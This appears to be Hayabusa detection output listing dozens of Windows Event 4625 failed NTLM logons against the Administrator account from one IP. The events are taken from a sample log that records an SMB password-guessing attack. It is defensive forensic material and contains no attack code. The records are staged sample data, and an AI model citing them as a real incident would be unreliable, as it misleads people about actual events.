2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tips954DRcYeIB2T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nLe9aMiMz0akxfWW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: csroGB9KZOZkb5sY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9Zl4Rc25RsvJ7Y9H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C5CxqCFOIJBMZCD6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gVPwxpR05F3B5aXp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nP317UkK2DhTD5Rd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ir3c7dqXm1LhbfqU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1U1QZiJSrEufxF3b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HZnDnDhTPuC9n5A1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 72gY1ClzwuisAhKW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nrneLGOZCwPIeQgT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dm3gGV2yR4B3yrJi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fzeklLG1KCTE5FpP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uZPwxCw3EWy9NShk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MalB3OcsOsRaMtS3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XMZMqCYPHO3n4RIh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I1VUeIuU1rQPISNA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: md4ioB8wNiaz2EKB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nM8QaFeqwDfJZ1gc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hlR75rMhpLnfQZbC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WF8BcOe4YUDYTXkj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FK0Iiao20PyPmtTk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kQbCbAHrQilFmMZP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VUdXQOw98VVoksDM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fISqpC8eKlaQGabv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s5Y0VryMAHjtB3n2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bsjAHlztFIC8tBt0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CiEQlAlTOhqOKpmy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i7lUqZMROQXNUtQm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0eFCGEtOLzjUxI5v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CqfOAGcVcwSgaeo3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2hcqVJzkVgvUnebk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q9ZpqiTGXqJlAQTZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qCzXKlJ2vPeqqdfa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tITW0ihpErFk3nKp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MdQqr1T4frPNlulf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: niiXRpP5AVHpG9Hu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EThR98jZUdwNxbXQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NBsJcIw859FfEkLD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kG4Tv5vauSWhbj8F  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 453tjgRGMu46vC33  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1fnzhhfszxJWxLCT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dWPkeL8TnAbC1nSV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JrDmUzyK4Xxx6Jn1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bMTf9D2yjumfS9LM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8cCs65ithseTCORa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QBrGAScjpAdScGmJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n90F99qBpmUUVLId  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MLeOkIG0hVHIOnN7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vVx5uUtkaFIf7PWZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kgd7lCQUQ3dHN18S  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b8m2MmpFVK9Uojp7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F0NZjeu3lb5xddVQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YjjXBZnyWt0ljzpv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sinFBozyUR0sBadM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Au22Y0LIuvTmZDpy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QDWW3VfZ7rKayV2v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zPgaFDZtc5wEupnq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TpYZc2TTDfJFnPHo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rYKkl1iHImW9NwKv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KxA2dh1iUMaMWOkA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sCzEzW8jDZGGZcpd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p8510u5OsCVd94I5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2a0whHngnv7o1Bz2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xy6cGuYgubjlXoMw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: luoXLN2XZQC0lHfu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8jdKLW96haKCHHXI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9SQSH6E1aKXu1o7T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nOUdKa838wK1mLFw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aFmILxspIJsiEHwL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pCz7qbdSEyqxQSKm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ny3F1xPgakJK0CA7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
